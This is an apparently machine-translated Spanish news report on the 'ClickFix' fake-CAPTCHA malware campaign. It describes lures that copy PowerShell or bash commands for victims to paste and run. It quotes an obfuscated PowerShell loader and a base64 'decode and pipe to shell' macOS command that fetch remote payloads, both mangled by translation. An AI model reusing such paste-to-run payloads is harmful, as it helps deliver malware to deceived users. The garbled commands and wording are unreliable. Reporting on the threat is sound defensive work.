Ha surgido una nueva y sofisticada campaña de malware que armaba páginas de verificación Captcha falsas para engañar a los usuarios para que ejecute comandos de PowerShell maliciosos, marcando una evolución significativa en las metodologías de ataque basadas en el navegador.
La campaña, denominada “ClickFix”, representa lo que los expertos en ciberseguridad están llamando una mutación de próxima generación de las estafas de actualización de navegador falso tradicional que dominaron el panorama de amenazas a lo largo de 2024.
El ataque comienza cuando las víctimas se encuentran con lo que parece ser un desafío legítimo de verificación Captcha, completo con la conocida marca de Google Recaptcha o Cloudflare.
Sin embargo, en lugar de resolver un rompecabezas tradicional, se les indica a los usuarios que verifiquen su humanidad a través de una serie de atajos de teclado que finalmente dan como resultado la ejecución del código malicioso oculto.
Clearfake a Clikfix a Captchageddon (fuente – Guardio)
La interfaz engañada copia un comando PowerShell al portapapeles de la víctima, luego los guía a través de pasos aparentemente inofensivos como presionar Windows+R, Ctrl+V e ingrese a “verificación completa”.
Lo que hace que esta campaña sea particularmente peligrosa es su rápida evolución de una simple malvertición a operaciones sofisticadas y multiplataforma que se dirigen a los sistemas de Windows, MacOS y Linux.
Evolución de propagación (fuente – Guardio)
El ataque ha desplazado con éxito los esquemas de actualización de navegador falso anteriores al eliminar la necesidad de descargas de archivos sospechosas y aprovechar la infraestructura confiable para parecer legítimo.
Investigadores de Guardio identificado Esta campaña como parte de su monitoreo continuo de las amenazas basadas en el navegador, señalando cómo los atacantes han refinado su enfoque en tres dimensiones críticas: métodos de propagación, sofisticación narrativa y técnicas de evasión.
El equipo de investigación observó la migración de la campaña de anuncios emergentes básicos en sitios web cuestionables a correos electrónicos de phishing altamente específicos que se hacen pasar por servicios legítimos como Booking.com.
Evolución técnica y expansión multiplataforma
El aspecto más preocupante de Captchageddon es su sofisticación técnica y capacidades de multiplataforma.
Páginas falsas de Captcha (fuente – Guardio)
Los ataques iniciales centrados en Windows utilizan comandos PowerShell fuertemente ofuscados diseñados para evadir los sistemas de detección basados en la firma. Por ejemplo, los atacantes transformaron comandos simples en variaciones complejas como:-
PowerShell -n “Op” R “de” I /Wh /”com” ma “$ s” r “t15 = ‘c” m “b” k “z8b” ui0000 “08k” 2 “2bcm3” b “(3k.info)
Cuando se desobfusó, esto revela un mecanismo directo de entrega de carga útil que obtiene y ejecuta código remoto de la infraestructura controlada por los atacantes.
La expansión de la campaña a MacOS representa un desarrollo particularmente alarmante, ya que explota la falta de familiaridad que la mayoría de los usuarios de Mac tienen con las interfaces de línea de comandos.
La variante MACOS instruye a las víctimas que abran la terminal a través de la búsqueda de atención y ejecute comandos bash codificados en Base64. Una carga útil típica de MacOS aparece como:
echo “y3vybcatcybodhrwoi8vnduumtm1ljizmi4zmy9kl3jvymvydg84ntg2nib8ig5vahvwigjhc2ggjg ==” | base64 -d | intento
Cuando se decodifica, este comando realiza una descarga y ejecución silenciosas de malware de servidores comprometidos.
Sitios comprometidos de WordPress que entregan captcha falsa (fuente – Guardio)
Los atacantes también han comenzado a aprovechar la plataforma Google Scripts para alojar sus flujos de captcha maliciosos, explotando la reputación de confianza de Google para evitar los filtros de seguridad mientras mantiene la aparición de procesos de verificación legítimos.
Evolución de la evasión (fuente – Guardio)
El análisis de infraestructura de la campaña revela operaciones altamente organizadas, con un análisis de agrupación que identifica distintos grupos de atacantes utilizando patrones de comando consistentes y estructuras de dominio.
Un clúster notable empleó constantemente la sintaxis de PowerShell limpia con los dominios de nivel superior.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
